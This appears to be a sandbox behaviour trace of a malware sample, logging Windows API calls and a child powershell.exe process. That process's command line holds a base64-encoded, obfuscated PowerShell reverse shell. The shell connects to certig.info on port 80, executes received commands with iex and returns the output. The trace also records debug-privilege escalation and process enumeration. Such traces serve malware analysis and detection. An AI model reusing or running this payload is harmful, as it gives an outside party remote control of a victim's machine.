	[0267.313] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60950b0, puCount=0x5faea84 | out: puCount=0x5faea84*=0x2) returned 0x0
	[0267.313] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5faea80*=0x0, pszText=0x0 | out: puBuffLength=0x5faea80*=0x17, pszText=0x0) returned 0x0
	[0267.313] WbemDefPath:IWbemPath:GetText (in: This=0x60950b0, lFlags=4, puBuffLength=0x5faea80*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea80*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.313] IWbemClassObject:Get (in: This=0x608eb40, wszName="TotalPhysicalMemory", lFlags=0, pVal=0x5faea40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30c29b0*=0, plFlavor=0x30c29b4*=0 | out: pVal=0x5faea40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2146942976", varVal2=0x0), pType=0x30c29b0*=21, plFlavor=0x30c29b4*=32) returned 0x0
	[0267.313] SysStringLen (param_1="2146942976") returned 0xa
	[0267.314] IWbemClassObject:Get (in: This=0x608eb40, wszName="TotalPhysicalMemory", lFlags=0, pVal=0x5faeaf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30c29b0*=21, plFlavor=0x30c29b4*=32 | out: pVal=0x5faeaf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2146942976", varVal2=0x0), pType=0x30c29b0*=21, plFlavor=0x30c29b4*=32) returned 0x0
	[0267.314] SysStringLen (param_1="2146942976") returned 0xa
	[0267.320] send (s=0x424, buf=0x30c34a4*, len=31, flags=0) returned 31
	[0267.321] GetLastError () returned 0x0
	[0267.321] recv (s=0x424, buf=0x2fac898, len=502, flags=0) 

Thread:
	id = 331
	os_tid = 0xd20


Thread:
	id = 334
	os_tid = 0xd2c


Thread:
	id = 352
	os_tid = 0xd98


Thread:
	id = 355
	os_tid = 0xda8


Thread:
	id = 358
	os_tid = 0xdb8


Thread:
	id = 361
	os_tid = 0xdc4


Process:
	id = "16"
	image_name = "powershell.exe"
	filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2b659000"
	os_pid = "0x904"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "6"
	os_parent_pid = "0xb30"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHAAQgBVAGMAUQA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAG0AQwBBAGIAPQAoACQAcABCAFUAYwBRAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABVAFEAQwBWAEkAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJAB2AHIASwBPAEcAPQAkAGQAbQBDAEEAYgAuAFIAZQBhAGQAKAAkAFUAUQBDAFYASQAsADAALAAkAFUAUQBDAFYASQAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAHcARQBsAHYASwA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAVQBRAEMAVgBJACwAMAAsACQAdgByAEsATwBHACkAOwAkAFcASABzAEIAeAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAdwBFAGwAdgBLACAAMgA+ACYAMQApACkAOwAkAGQAbQBDAEEAYgAuAFcAcgBpAHQAZQAoACQAVwBIAHMAQgB4ACwAMAAsACQAVwBIAHMAQgB4AC4ATABlAG4AZwB0AGgAKQA7ACQAZABtAEMAQQBiAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABwAEIAVQBjAFEALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcABCAFUAYwBRAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 227
	os_tid = 0xbec

	[0198.533] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0198.950] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0198.950] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0198.950] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0198.950] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0201.358] GetVersionExW (in: lpVersionInformation=0x7a42a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x7a42a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0201.359] GetLastError () returned 0x2
	[0201.361] GetVersionExW (in: lpVersionInformation=0x7a42a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x7a42a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0201.361] GetLastError () returned 0x2
	[0201.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e43c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0201.372] GetLastError () returned 0x2
	[0201.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e458, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0201.382] GetLastError () returned 0x2
	[0201.383] GetVersionExW (in: lpVersionInformation=0x7a42a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x7a42a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0201.383] GetLastError () returned 0x2
	[0201.385] SetErrorMode (uMode=0x1) returned 0x1
	[0201.387] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x29e8d8 | out: lpFileInformation=0x29e8d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0201.387] GetLastError () returned 0x2
	[0201.387] SetErrorMode (uMode=0x1) returned 0x1
	[0201.391] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x29e95c | out: lpdwHandle=0x29e95c) returned 0x94c
	[0201.393] GetLastError () returned 0x0
	[0201.395] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ab5ac4 | out: lpData=0x2ab5ac4) returned 1
	[0201.536] VerQueryValueW (in: pBlock=0x2ab5ac4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x29e928, puLen=0x29e924 | out: lplpBuffer=0x29e928*=0x2ab5b60, puLen=0x29e924) returned 1
	[0201.539] lstrlenW (lpString="䅁") returned 1
	[0201.552] VerQueryValueW (in: pBlock=0x2ab5ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x29e8a4, puLen=0x29e8a0 | out: lplpBuffer=0x29e8a4*=0x2ab5c3c, puLen=0x29e8a0) returned 1
	[0201.553] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0201.555] lstrcpyW (in: lpString1=0x7a4288, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0201.555] VerQueryValueW (in: pBlock=0x2ab5ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x29e8a4, puLen=0x29e8a0 | out: lplpBuffer=0x29e8a4*=0x2ab5c90, puLen=0x29e8a0) returned 1
	[0201.555] lstrlenW (lpString="System.Management.Automation") returned 28
	[0201.555] lstrcpyW (in: lpString1=0x7a4288, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0201.555] VerQueryValueW (in: pBlock=0x2ab5ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x29e8a4, puLen=0x29e8a0 | out: lplpBuffer=0x29e8a4*=0x2ab5cec, puLen=0x29e8a0) returned 1
	[0201.556] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0201.556] lstrcpyW (in: lpString1=0x7a4288, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0201.556] VerQueryValueW (in: pBlock=0x2ab5ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x29e8a4, puLen=0x29e8a0 | out: lplpBuffer=0x29e8a4*=0x2ab5d2c, puLen=0x29e8a0) returned 1
	[0201.556] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0201.556] lstrcpyW (in: lpString1=0x7a4288, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0201.556] VerQueryValueW (in: pBlock=0x2ab5ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x29e8a4, puLen=0x29e8a0 | out: lplpBuffer=0x29e8a4*=0x2ab5d94, puLen=0x29e8a0) returned 1
	[0201.556] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0201.556] lstrcpyW (in: lpString1=0x7a4288, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0201.556] VerQueryValueW (in: pBlock=0x2ab5ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x29e8a4, puLen=0x29e8a0 | out: lplpBuffer=0x29e8a4*=0x2ab5e30, puLen=0x29e8a0) returned 1
	[0201.556] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0201.556] lstrcpyW (in: lpString1=0x7a4288, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0201.556] VerQueryValueW (in: pBlock=0x2ab5ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x29e8a4, puLen=0x29e8a0 | out: lplpBuffer=0x29e8a4*=0x2ab5e94, puLen=0x29e8a0) returned 1
	[0201.556] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0201.557] lstrcpyW (in: lpString1=0x7a4288, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0201.557] VerQueryValueW (in: pBlock=0x2ab5ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x29e8a4, puLen=0x29e8a0 | out: lplpBuffer=0x29e8a4*=0x2ab5f10, puLen=0x29e8a0) returned 1
	[0201.557] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0201.557] lstrcpyW (in: lpString1=0x7a4288, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0201.557] VerQueryValueW (in: pBlock=0x2ab5ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x29e8a4, puLen=0x29e8a0 | out: lplpBuffer=0x29e8a4*=0x2ab5bb8, puLen=0x29e8a0) returned 1
	[0201.557] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0201.557] lstrcpyW (in: lpString1=0x7a4288, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0201.557] VerQueryValueW (in: pBlock=0x2ab5ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x29e8a4, puLen=0x29e8a0 | out: lplpBuffer=0x29e8a4*=0x0, puLen=0x29e8a0) returned 0
	[0201.557] VerQueryValueW (in: pBlock=0x2ab5ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x29e8a4, puLen=0x29e8a0 | out: lplpBuffer=0x29e8a4*=0x0, puLen=0x29e8a0) returned 0
	[0201.557] VerQueryValueW (in: pBlock=0x2ab5ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x29e8a4, puLen=0x29e8a0 | out: lplpBuffer=0x29e8a4*=0x0, puLen=0x29e8a0) returned 0
	[0201.557] VerQueryValueW (in: pBlock=0x2ab5ac4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x29e898, puLen=0x29e894 | out: lplpBuffer=0x29e898*=0x2ab5b60, puLen=0x29e894) returned 1
	[0201.560] VerLanguageNameW (in: wLang=0x0, szLang=0x7a4288, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0201.561] VerQueryValueW (in: pBlock=0x2ab5ac4, lpSubBlock="\\", lplpBuffer=0x29e8ac, puLen=0x29e8a8 | out: lplpBuffer=0x29e8ac*=0x2ab5aec, puLen=0x29e8a8) returned 1
	[0201.680] GetCurrentProcessId () returned 0x904
	[0201.688] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x29e0e4 | out: lpLuid=0x29e0e4*(LowPart=0x14, HighPart=0)) returned 1
	[0201.690] GetLastError () returned 0x0
	[0201.692] GetCurrentProcess () returned 0xffffffff
	[0201.692] GetLastError () returned 0x0
	[0201.694] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x29e0e0 | out: TokenHandle=0x29e0e0*=0x314) returned 1
	[0201.694] GetLastError () returned 0x0
	[0201.697] AdjustTokenPrivileges (in: TokenHandle=0x314, DisableAllPrivileges=0, NewState=0x2ab8604*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0201.697] GetLastError () returned 0x0
	[0201.699] CloseHandle (hObject=0x314) returned 1
	[0201.699] GetLastError () returned 0x0
	[0201.704] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x904) returned 0x314
	[0201.704] GetLastError () returned 0x0
	[0201.717] EnumProcessModules (in: hProcess=0x314, lphModule=0x2ab8648, cb=0x100, lpcbNeeded=0x29e8d4 | out: lphModule=0x2ab8648, lpcbNeeded=0x29e8d4) returned 1
	[0201.718] GetLastError () returned 0x0
	[0201.722] GetModuleInformation (in: hProcess=0x314, hModule=0x221d0000, lpmodinfo=0x2ab8788, cb=0xc | out: lpmodinfo=0x2ab8788*(lpBaseOfDll=0x221d0000, SizeOfImage=0x72000, EntryPoint=0x221d7363)) returned 1
	[0201.722] GetLastError () returned 0x0
	[0201.928] GetModuleBaseNameW (in: hProcess=0x314, hModule=0x221d0000, lpBaseName=0x7a4a48, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0201.928] GetLastError () returned 0x0
	[0201.929] GetModuleFileNameExW (in: hProcess=0x314, hModule=0x221d0000, lpFilename=0x7a4a48, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0201.930] GetLastError () returned 0x0
	[0201.931] CloseHandle (hObject=0x314) returned 1
	[0201.931] GetLastError () returned 0x0
	[0201.931] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x904) returned 0x314
	[0201.931] GetLastError () returned 0x0
	[0201.934] GetExitCodeProcess (in: hProcess=0x314, lpExitCode=0x2ab7c38 | out: lpExitCode=0x2ab7c38*=0x103) returned 1
	[0201.934] GetLastError () returned 0x0
	[0201.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3ab5278, Length=0x20000, ResultLength=0x29e91c | out: SystemInformation=0x3ab5278, ResultLength=0x29e91c*=0xfa70) returned 0x0
	[0201.966] EnumWindows (lpEnumFunc=0x2973612, lParam=0x0) returned 1
	[0201.970] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0201.970] GetLastError () returned 0x0
	[0201.970] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0201.970] GetLastError () returned 0x0
	[0201.970] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0201.970] GetLastError () returned 0x0
	[0201.970] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0201.970] GetLastError () returned 0x0
	[0201.970] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0201.971] GetLastError () returned 0x0
	[0201.971] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0201.971] GetLastError () returned 0x0
	[0201.971] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0201.971] GetLastError () returned 0x0
	[0201.971] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0201.971] GetLastError () returned 0x0
	[0201.971] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0201.971] GetLastError () returned 0x0
	[0201.971] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0201.971] GetLastError () returned 0x0
	[0201.972] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x538
	[0201.972] GetLastError () returned 0x0
	[0201.972] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0201.972] GetLastError () returned 0x0
	[0201.972] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0201.972] GetLastError () returned 0x0
	[0201.972] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0201.972] GetLastError () returned 0x0
	[0201.972] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x514
	[0201.972] GetLastError () returned 0x0
	[0201.972] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0201.973] GetLastError () returned 0x0
	[0201.973] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x778
	[0201.973] GetLastError () returned 0x0
	[0201.973] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x778
	[0201.973] GetLastError () returned 0x0
	[0201.973] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x458
	[0201.973] GetLastError () returned 0x0
	[0201.973] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0201.973] GetLastError () returned 0x0
	[0201.973] GetWindowThreadProcessId (in: hWnd=0xa0266, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0xa18
	[0201.973] GetLastError () returned 0x0
	[0201.974] GetWindowThreadProcessId (in: hWnd=0x14017c, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x978
	[0201.974] GetLastError () returned 0x0
	[0202.172] GetWindowThreadProcessId (in: hWnd=0x5026a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x838
	[0202.172] GetLastError () returned 0x0
	[0202.173] GetWindowThreadProcessId (in: hWnd=0x50160, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0xb2c
	[0202.173] GetLastError () returned 0x0
	[0202.173] GetWindowThreadProcessId (in: hWnd=0x40298, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x8d4
	[0202.173] GetLastError () returned 0x0
	[0202.173] GetWindowThreadProcessId (in: hWnd=0x4015e, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x874
	[0202.173] GetLastError () returned 0x0
	[0202.173] GetWindowThreadProcessId (in: hWnd=0x50268, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x9a8
	[0202.173] GetLastError () returned 0x0
	[0202.173] GetWindowThreadProcessId (in: hWnd=0x60106, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0xb40
	[0202.173] GetLastError () returned 0x0
	[0202.174] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0xa00
	[0202.174] GetLastError () returned 0x0
	[0202.174] GetWindowThreadProcessId (in: hWnd=0x900a6, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0202.174] GetLastError () returned 0x0
	[0202.174] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0202.174] GetLastError () returned 0x0
	[0202.174] GetWindowThreadProcessId (in: hWnd=0x400d0, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0202.174] GetLastError () returned 0x0
	[0202.174] GetWindowThreadProcessId (in: hWnd=0x400f0, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0202.174] GetLastError () returned 0x0
	[0202.175] GetWindowThreadProcessId (in: hWnd=0x300de, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0202.175] GetLastError () returned 0x0
	[0202.175] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0202.175] GetLastError () returned 0x0
	[0202.175] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0202.175] GetLastError () returned 0x0
	[0202.175] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0202.175] GetLastError () returned 0x0
	[0202.176] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x9f0
	[0202.176] GetLastError () returned 0x0
	[0202.176] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x9e0
	[0202.176] GetLastError () returned 0x0
	[0202.176] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x9d0
	[0202.176] GetLastError () returned 0x0
	[0202.176] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x9c0
	[0202.176] GetLastError () returned 0x0
	[0202.176] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x9b0
	[0202.176] GetLastError () returned 0x0
	[0202.177] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x9a0
	[0202.177] GetLastError () returned 0x0
	[0202.177] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x990
	[0202.177] GetLastError () returned 0x0
	[0202.177] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x980
	[0202.177] GetLastError () returned 0x0
	[0202.177] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x970
	[0202.177] GetLastError () returned 0x0
	[0202.177] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x960
	[0202.178] GetLastError () returned 0x0
